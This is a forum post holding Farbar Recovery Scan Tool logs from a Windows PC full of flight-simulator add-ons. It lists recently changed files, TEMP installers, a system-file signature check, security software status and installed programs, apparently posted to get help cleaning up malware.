2014-11-11 21:19 - 2014-05-17 14:39 - 00000000 ___SD () C:\Windows\system32\CompatTel

2014-11-11 21:19 - 2014-03-16 13:14 - 00000000 ___RD () C:\Users\Swintal\Google Drive

2014-11-11 21:19 - 2014-03-02 15:57 - 00000000 ____D () C:\Windows\Minidump

2014-11-11 21:19 - 2014-03-02 13:18 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Virtuali

2014-11-11 21:19 - 2014-03-01 12:28 - 00000000 ____D () C:\Users\Swintal

2014-11-11 21:19 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\registration

2014-11-11 21:19 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions

2014-11-11 21:16 - 2014-08-10 14:33 - 00000916 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000UA.job

2014-11-11 21:13 - 2014-03-01 15:15 - 01648133 _____ () C:\Windows\WindowsUpdate.log

2014-11-11 21:13 - 2009-07-13 23:45 - 00031904 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

2014-11-11 21:13 - 2009-07-13 23:45 - 00031904 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

2014-11-11 21:07 - 2014-03-02 15:57 - 1095844079 _____ () C:\Windows\MEMORY.DMP

2014-11-11 17:05 - 2014-07-10 17:00 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job

2014-11-11 16:58 - 2014-03-01 12:59 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job

2014-11-11 16:15 - 2010-11-20 22:47 - 00099780 _____ () C:\Windows\PFRO.log

2014-11-11 15:05 - 2014-07-10 17:00 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe

2014-11-11 15:05 - 2014-07-10 17:00 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

2014-11-11 15:05 - 2014-07-10 17:00 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater

2014-11-11 14:56 - 2014-06-07 15:03 - 00000000 ____D () C:\Users\Public\Documents\PFPX Data

2014-11-11 14:56 - 2014-03-02 14:25 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\aerosoft

2014-11-11 14:56 - 2014-03-01 12:36 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information

2014-11-11 13:19 - 2014-03-02 13:18 - 00000000 ____D () C:\ProgramData\TEMP

2014-11-11 13:18 - 2014-03-01 20:09 - 00000000 ____D () C:\Users\Swintal\Documents\Flight Simulator X Files

2014-11-11 13:00 - 2014-03-08 12:42 - 00000000 ____D () C:\Users\Swintal\Downloads\WOAi

2014-11-11 12:54 - 2014-03-03 10:22 - 00000000 ____D () C:\Users\Swintal\Downloads\LUVCARS_4_Build_1_Beta_6

2014-11-11 12:41 - 2014-09-14 14:16 - 00000000 ____D () C:\Users\Swintal\Documents\Paradox Interactive

2014-11-11 12:41 - 2014-06-30 18:01 - 00000000 ____D () C:\Users\Swintal\Documents\RCT3

2014-11-11 12:40 - 2014-09-29 18:55 - 00000000 ____D () C:\Users\Swintal\Desktop\Jake Photos

2014-11-11 12:40 - 2014-08-16 13:04 - 00000000 ____D () C:\Users\Swintal\Documents\FS Flight Keeper

2014-11-11 12:40 - 2014-05-11 15:32 - 00000000 ___SD () C:\Users\Swintal\Documents\My Data Sources

2014-11-11 12:40 - 2014-03-15 11:44 - 00000000 ____D () C:\Users\Swintal\Documents\Garmin

2014-11-11 12:40 - 2014-03-14 13:01 - 00000000 ____D () C:\Users\Swintal\Documents\Aerosoft

2014-11-11 12:40 - 2014-03-07 16:55 - 00000000 ____D () C:\Users\Swintal\Documents\Andreas Folder

2014-11-11 12:39 - 2014-10-04 11:39 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\NBSoftSolutions

2014-11-11 12:39 - 2014-03-02 12:38 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\PMDG

2014-11-11 12:38 - 2014-09-27 06:31 - 00000000 ____D () C:\Users\Swintal\AppData\Local\PI Engineering

2014-11-11 12:38 - 2014-06-30 18:01 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Atari

2014-11-11 12:38 - 2014-06-20 16:15 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Juniper Networks

2014-11-11 12:38 - 2014-05-16 07:45 - 00000000 ____D () C:\Users\Swintal\AppData\Local\Origin

2014-11-11 12:38 - 2014-04-05 18:19 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Apple Computer

2014-11-11 12:38 - 2014-03-15 11:38 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Garmin

2014-11-11 12:37 - 2014-03-16 09:43 - 00000000 ____D () C:\Users\Swintal\AppData\Local\HP

2014-11-11 12:37 - 2014-03-01 12:59 - 00000000 ____D () C:\Users\Swintal\AppData\Local\Google

2014-11-11 12:36 - 2014-03-02 16:42 - 00000000 ____D () C:\Users\Swintal\AppData\Local\Apps\2.0

2014-11-11 12:35 - 2014-10-03 14:52 - 00000000 ____D () C:\Users\Swintal\AppData\Local\AAC7AD0A-50D1-41BC-A353-7B7B50729544.aplzod

2014-11-11 12:35 - 2014-04-05 18:19 - 00000000 ____D () C:\Users\Swintal\AppData\Local\Apple Computer

2014-11-11 12:34 - 2014-05-16 07:42 - 00000000 ____D () C:\ProgramData\Origin

2014-11-11 12:34 - 2014-03-15 11:42 - 00000000 ____D () C:\ProgramData\Garmin

2014-11-11 10:16 - 2014-08-10 14:33 - 00000864 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000Core.job

2014-11-11 08:01 - 2014-03-02 12:38 - 00116616 _____ () C:\Users\Swintal\AppData\Local\GDIPFONTCACHEV1.DAT

2014-11-11 07:59 - 2009-07-13 23:45 - 00448104 _____ () C:\Windows\system32\FNTCACHE.DAT

2014-11-11 07:57 - 2014-03-01 19:17 - 00729172 _____ () C:\Windows\DirectX.log

2014-11-09 20:19 - 2014-03-02 13:08 - 00002010 _____ () C:\Users\Swintal\AppData\Roaming\mainhst.zgh

2014-11-09 17:26 - 2014-07-03 17:20 - 00002609 _____ () C:\Users\Public\Desktop\Navtech PBS.lnk

2014-11-08 13:44 - 2014-06-30 16:00 - 00000000 ____D () C:\Program Files (x86)\Steam

2014-11-08 08:30 - 2009-07-14 00:13 - 00781298 _____ () C:\Windows\system32\PerfStringBackup.INI

2014-11-07 17:49 - 2014-10-03 14:34 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69

2014-11-07 17:49 - 2014-04-05 18:18 - 00000000 ____D () C:\Program Files\Common Files\Apple

2014-11-06 12:06 - 2014-09-01 15:44 - 01715224 _____ (NVIDIA Corporation) C:\Windows\system32\nvspbridge64.dll

2014-11-06 12:06 - 2014-09-01 15:44 - 01291280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspbridge.dll

2014-11-06 12:06 - 2014-03-01 16:24 - 02800296 _____ (NVIDIA Corporation) C:\Windows\system32\nvspcap64.dll

2014-11-06 12:06 - 2014-03-01 16:24 - 02197680 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspcap.dll

2014-11-05 12:48 - 2014-05-18 08:27 - 00000000 ____D () C:\ProgramData\ACARS

2014-11-05 11:00 - 2014-03-16 13:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive

2014-11-04 15:40 - 2014-03-01 18:40 - 00000000 ____D () C:\Windows\system32\MRT

2014-11-01 17:05 - 2014-06-07 15:06 - 00000777 _____ () C:\Users\Public\Desktop\Aerosoft Launcher.lnk

2014-11-01 16:54 - 2014-08-16 12:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UK2000 Scenery

2014-11-01 13:07 - 2014-03-02 12:28 - 00014352 _____ () C:\Users\Swintal\Downloads\Activation Code Workbook.xlsx

2014-10-28 09:00 - 2014-03-01 13:00 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk

2014-10-28 08:14 - 2009-07-14 00:08 - 00032608 _____ () C:\Windows\Tasks\SCHEDLGU.TXT

2014-10-28 05:34 - 2010-11-20 22:27 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

2014-10-26 09:21 - 2014-05-18 08:27 - 00002041 _____ () C:\Users\Public\Desktop\UVACARS.lnk

2014-10-25 09:50 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\NDF

2014-10-25 07:53 - 2014-03-03 09:26 - 00000000 ____D () C:\Program Files\Microsoft Office 15

2014-10-19 08:53 - 2014-03-01 12:59 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA

2014-10-19 08:53 - 2014-03-01 12:59 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore

2014-10-18 09:11 - 2014-08-10 14:33 - 00003890 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000UA

2014-10-18 09:11 - 2014-08-10 14:33 - 00003494 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000Core

2014-10-17 03:00 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache

 

Files to move or delete:

====================

C:\Users\Swintal\FlightBeam_Denver International - HD.reg

C:\Users\Swintal\FlightBeam_Washington Dulles Intl - HD.reg

C:\Users\Swintal\FSDreamTeam_JFK.reg

C:\Users\Swintal\FSDreamTeam_KIAH.reg

C:\Users\Swintal\FSDreamTeam_Los Angeles V2.reg

C:\Users\Swintal\QualityWings_Ultimate 757 Collection.reg

 

 

Some content of TEMP:

====================

C:\Users\Swintal\AppData\Local\Temp\Couponscom.exe

C:\Users\Swintal\AppData\Local\Temp\dsHostCheckerSetup.exe

C:\Users\Swintal\AppData\Local\Temp\InstHelper.exe

C:\Users\Swintal\AppData\Local\Temp\jre-7u55-windows-i586-iftw.exe

C:\Users\Swintal\AppData\Local\Temp\jre-7u65-windows-i586-iftw.exe

C:\Users\Swintal\AppData\Local\Temp\jre-7u67-windows-i586-iftw.exe

C:\Users\Swintal\AppData\Local\Temp\MouseKeyboardCenterx64_1033.exe

C:\Users\Swintal\AppData\Local\Temp\nvSCPAPI.dll

C:\Users\Swintal\AppData\Local\Temp\nvSCPAPI64.dll

C:\Users\Swintal\AppData\Local\Temp\nvStInst.exe

 

 

==================== Bamital & volsnap Check =================

 

(There is no automatic fix for files that do not pass verification.)

 

C:\Windows\System32\winlogon.exe => File is digitally signed

C:\Windows\System32\wininit.exe => File is digitally signed

C:\Windows\SysWOW64\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\System32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\System32\services.exe => File is digitally signed

C:\Windows\System32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\System32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\System32\rpcss.dll => File is digitally signed

C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

 

 

LastRegBack: 2014-11-05 12:09

 

==================== End Of Log ============================

Link to post
Share on other sites

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10-11-2014

Ran by Swintal at 2014-11-11 21:38:57

Running from C:\Users\Swintal\Desktop

Boot Mode: Normal

==========================================================

 

 

==================== Security Center ========================

 

(If an entry is included in the fixlist, it will be removed.)

 

AV: ESET Smart Security 8.0 (Enabled - Up to date) {19259FAE-8396-A113-46DB-15B0E7DFA289}

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AS: ESET Smart Security 8.0 (Enabled - Up to date) {A2447E4A-A5AC-AE9D-7C6B-2EC29C58E834}

FW: ESET Personal firewall (Enabled) {211E1E8B-C9F9-A04B-6D84-BC85190CE5F2}

 

==================== Installed Programs ======================

 

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 

A2A C172 Trainer for FSX (HKLM-x32\...\A2A C172 Trainer for FSX) (Version:  - )

ACARS - 1  (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\2acd65cafe4fafc9) (Version: 2.21.0.22 - United Virtual Airlines)

ACARS (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\ca11877970cf2b3f) (Version: 2.0.0.48 - United Virtual Airlines)

Active Sky Next for FSX SP1B (HKLM-x32\...\{F1AE1E08-5094-46AD-AA4D-670C482723B2}_is1) (Version: 1.0.5410.16208 - HiFi Technologies, Inc.)

Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.223 - Adobe Systems Incorporated)

Adobe Reader X (10.1.12) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)

Aerosoft's - Aerosoft Launcher (HKLM-x32\...\{EE11CFFC-898C-4875-8A63-8B732A9AD43B}) (Version: 1.2.0.3 - Aerosoft)

Aerosoft's - Airbus A318-A319 - FSX (HKLM-x32\...\Airbus A318-A319 - FSX) (Version: 1.10 - Aerosoft)

Aerosoft's - Airbus A320-A321 - FSX (HKLM-x32\...\Airbus A320-A321 - FSX) (Version: 1.00 - Aerosoft)

Aerosoft's - Anchorage X - FSX (HKLM-x32\...\Anchorage X - FSX) (Version:  - )

Aerosoft's - Mega Airport Dublin - FSX (HKLM-x32\...\Mega Airport Dublin - FSX) (Version: 1.10 - Aerosoft)

Aerosoft's - Mega Airport Duesseldorf - FSX (HKLM-x32\...\Mega Airport Duesseldorf - FSX) (Version:  - )

aerosoft's - Mega Airport Frankfurt X (HKLM-x32\...\{BAEE0C24-C8C2-4820-9DF4-887909F1A286}) (Version: 1.04 - aerosoft)

Aerosoft's - Mega Airport London Heathrow Xtended - FSX (HKLM-x32\...\Mega Airport London Heathrow Xtended - FSX) (Version: 1.00 - Aerosoft)

ANT Drivers Installer x64 (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden

Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)

Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)

Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)

ASConnect for FSX Installer (HKLM-x32\...\{7E1270D4-42C4-49A4-9EC4-3300D2E47331}_is1) (Version: 1.0.5410.16224 - HiFi Technologies, Inc.)

Asmedia ASM106x SATA Host Controller Driver (HKLM-x32\...\{61942EF5-2CD8-47D4-869C-2E9A8BB085F1}) (Version: 1.3.4.001 - Asmedia Technology)

B1900D HD SERIES FSX/P3D (HKLM-x32\...\B1900D HD SERIES FSX/P3D) (Version: 1.00.00.00 - Carenado)

Black ICE 6.21r2945 (HKLM-x32\...\{015E0577-7D4A-456C-A435-DD9EE7E72589}_is1) (Version: 6.21r2945 - Panzeroo, Inc.)

bluCARS (HKLM-x32\...\{BD892214-8231-4910-8DBB-F277EE572B15}) (Version: 1.0.1014 - FS Products)

Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)

CANON iMAGE GATEWAY MyCamera Download Plugin (HKLM-x32\...\MyCamera Download Plugin) (Version: 3.1.1.2 - Canon Inc.)

CANON iMAGE GATEWAY Task for ZoomBrowser EX (HKLM-x32\...\CANON iMAGE GATEWAY Task) (Version: 1.9.0.9 - Canon Inc.)

Canon MOV Decoder (HKLM-x32\...\Canon MOV Decoder) (Version: 1.8.0.7 - Canon Inc.)

Canon MOV Encoder (HKLM-x32\...\Canon MOV Encoder) (Version: 1.6.0.1 - Canon Inc.)

Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\...\MovieEditTask) (Version: 3.7.0.4 - Canon Inc.)

Canon Utilities Digital Photo Professional 3.10 (HKLM-x32\...\DPP) (Version: 3.10.2.0 - Canon Inc.)

Canon Utilities EOS Utility (HKLM-x32\...\EOS Utility) (Version: 2.10.2.0 - Canon Inc.)

Canon Utilities EOS Video Snapshot Task for ZoomBrowser EX (HKLM-x32\...\EOS Video Snapshot Task) (Version: 1.0.0.10 - Canon Inc.)

Canon Utilities PhotoStitch (HKLM-x32\...\PhotoStitch) (Version: 3.1.22.46 - Canon Inc.)

Canon Utilities Picture Style Editor (HKLM-x32\...\Picture Style Editor) (Version: 1.9.0.0 - Canon Inc.)

Canon Utilities ZoomBrowser EX (HKLM-x32\...\ZoomBrowser EX) (Version: 6.7.0.24 - Canon Inc.)

Canon ZoomBrowser EX Memory Card Utility (HKLM-x32\...\ZoomBrowser EX Memory Card Utility) (Version: 1.5.0.9 - Canon Inc.)

Cheat Engine 6.4 (HKLM-x32\...\Cheat Engine 6.4_is1) (Version:  - Cheat Engine)

D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden

Elevated Installer (x32 Version: 3.2.16.0 - Garmin Ltd or its subsidiaries) Hidden

Empire: Total War (HKLM-x32\...\Steam App 10500) (Version:  - The Creative Assembly)

ESET Smart Security (HKLM\...\{C082CDB9-D173-4740-AE0E-C685E6F44850}) (Version: 8.0.304.0 - ESET, spol s r. o.)

Flight Simulator X (HKLM-x32\...\RTMshadow_{A9729B90-D37B-4A69-B66A-7436AC1F7274}) (Version:  - )

Flight Simulator X Service Pack 1 (HKLM-x32\...\SP1shadow_{A9729B90-D37B-4A69-B66A-7436AC1F7274}) (Version:  - )

FlightBeam Denver FSX (HKLM-x32\...\FlightBeam Denver FSX_is1) (Version: 1.0 - FlightBeam.)

FlightBeam San Francisco International FSX (HKLM-x32\...\FlightBeam San Francisco International FSX_is1) (Version: 2.1 - FlightBeam.)

FlightBeam Washington Dulles FSX (HKLM-x32\...\FlightBeam Washington Dulles FSX_is1) (Version: 1.2.3 - FlightBeam.)

FS Flight Keeper (HKLM-x32\...\{B7057895-A93D-44D6-B87A-D3C1FCF28E01}) (Version: 3.5.1 - Thomas Molitor & Aerosoft GmbH)

FSDreamTeam Hawaiian Airports Volume 2 FSX (HKLM-x32\...\FSDreamTeam Hawaiian Airports Volume 2 FSX_is1) (Version: 1.5.1 - VIRTUALI Sagl)

FSDreamTeam Honolulu International FSX (HKLM-x32\...\FSDreamTeam Honolulu International FSX_is1) (Version: 1.4 - VIRTUALI s.a.s.)

FSDreamTeam Houston Intercontinental Airport FSX (HKLM-x32\...\FSDreamTeam Houston Intercontinental Airport FSX_is1) (Version: 1.0.2 - VIRTUALI Sagl)

FSDreamTeam KJFK FSX (HKLM-x32\...\FSDreamTeam KJFK FSX_is1) (Version: 1.3 - VIRTUALI s.a.s.)

FSDreamTeam Las Vegas McCarran FSX (HKLM-x32\...\FSDreamTeam Las Vegas McCarran FSX_is1) (Version: 1.3 - VIRTUALI s.a.s.)

FSDreamTeam Los Angeles International FSX (HKLM-x32\...\FSDreamTeam Los Angeles International FSX_is1) (Version: 1.5 - VIRTUALI s.a.s.)

FSDreamTeam OHareX FSX (HKLM-x32\...\FSDreamTeam OHareX FSX_is1) (Version: 2.3 - VIRTUALI s.a.s.)

FSFDT FSCopilot (HKLM-x32\...\FSFDT FSCopilot) (Version:  - )

FSFDT FSInn (HKLM-x32\...\FSFDT FSInn) (Version:  - )

Galeao Intl Airport FSX Prepar3d 2.1 (HKLM-x32\...\sbgl2012fsx) (Version: 2.1 - TropicalSim)

Garmin Express (HKLM-x32\...\{817c6bb8-ea2d-4e12-abbc-e33c3de43f64}) (Version: 3.2.16.0 - Garmin Ltd or its subsidiaries)

Garmin Express (x32 Version: 3.2.16.0 - Garmin Ltd or its subsidiaries) Hidden

Garmin Express Tray (x32 Version: 3.2.16.0 - Garmin Ltd or its subsidiaries) Hidden

Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)

Globe Cargo PIREP (HKLM-x32\...\{93E6FA87-33AD-429C-BE11-F947250FE3BA}) (Version: 3.0.1 - Globe Cargo Virtual Airlines)

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)

Google Drive (HKLM-x32\...\{C60F3836-333A-4AE2-B526-CFDBA143A9BA}) (Version: 1.18.7821.2489 - Google, Inc.)

Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)

Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden

Google+ Auto Backup (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Google+ Auto Backup) (Version: 1.0.26.151 - Google, Inc.)

Hearts of Iron III (HKLM-x32\...\Steam App 25890) (Version:  - Paradox Development Studio)

HP ENVY 4500 series Basic Device Software (HKLM\...\{38A08516-1847-43E4-8076-9540B60EC43B}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)

HP ENVY 4500 series Help (HKLM-x32\...\{95BECC50-22B4-4FCA-8A2E-BF77713E6D3A}) (Version: 30.0.0 - Hewlett Packard)

HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)

HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)

iCloud (HKLM\...\{2AAF09D5-4B3F-4975-B6A9-ECE2631FC942}) (Version: 4.0.5.20 - Apple Inc.)

Intel® Network Connections 18.1.59.0 (HKLM\...\PROSetDX) (Version: 18.1.59.0 - Intel)

Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)

iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)

Juniper Networks Host Checker (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Neoteris_Host_Checker) (Version: 7.1.0.20169 - Juniper Networks)

Juniper Networks, Inc. Setup Client (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Juniper_Setup_Client) (Version: 7.1.6.17115 - Juniper Networks, Inc.)

MacroWorks 3.1 (HKLM-x32\...\MacroWorks 3.1) (Version:  - PI Engineering)

Majestic MJC8Q400 Version 1.008 (HKLM-x32\...\MJC8Q400) (Version:  - )

Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)

Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)

Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)

Microsoft Flight Simulator X: Acceleration (HKLM-x32\...\FlightSim_{A9729B90-D37B-4A69-B66A-7436AC1F7274}) (Version: 10.0.61637.0 - Microsoft Game Studios)

Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.3.188.0 - Microsoft Corporation)

Microsoft Office Professional Plus 2013 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 15.0.4659.1001 - Microsoft Corporation)

Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)

Microsoft SQL Server Compact 3.5 SP1 English (HKLM-x32\...\{E59113EB-0285-4BFD-A37A-B79EAC6B8F4B}) (Version: 3.5.5692.0 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{9634d50a-0c4d-4f52-8a9f-894a2baae370}) (Version: 11.0.60610.1 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 (HKLM-x32\...\{8e70e4e1-06d7-470b-9f74-a51bef21088e}) (Version: 11.0.51106.1 - Microsoft Corporation)

Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)

Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden

MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)

MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)

MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)

Navigraph FMS Data Manager 1.0.11.0603 (HKLM-x32\...\{7E4D5716-374A-4DB6-90CF-D2AEB67362CE}_is1) (Version: 1.0.11.0603 - Navigraph)

Navtech PBS (HKLM-x32\...\{3582DCD8-F0DF-4B2A-808A-2A67BEFEAFA0}) (Version: 14.5.5 - Navtech Inc)

NVIDIA 3D Vision Controller Driver 340.50 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 340.50 - NVIDIA Corporation)

NVIDIA 3D Vision Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 340.52 - NVIDIA Corporation)

NVIDIA GeForce Experience 2.1.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.4 - NVIDIA Corporation)

NVIDIA Graphics Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 340.52 - NVIDIA Corporation)

NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)

NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)

Office 15 Click-to-Run Extensibility Component (Version: 15.0.4659.1001 - Microsoft Corporation) Hidden

Office 15 Click-to-Run Licensing Component (Version: 15.0.4659.1001 - Microsoft Corporation) Hidden

Office 15 Click-to-Run Localization Component (Version: 15.0.4659.1001 - Microsoft Corporation) Hidden

Origin (HKLM-x32\...\Origin) (Version: 9.4.6.2792 - Electronic Arts, Inc.)

PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.7.3 - pdfforge)

Photo Common (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

Photo Gallery (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)

PMDG 737 6700 NGX RTM (HKLM-x32\...\{C7EE862A-D83D-4A9F-B746-CBDE39BD7001}) (Version: 1.00.3219 - PMDG Simulations, LLC.)

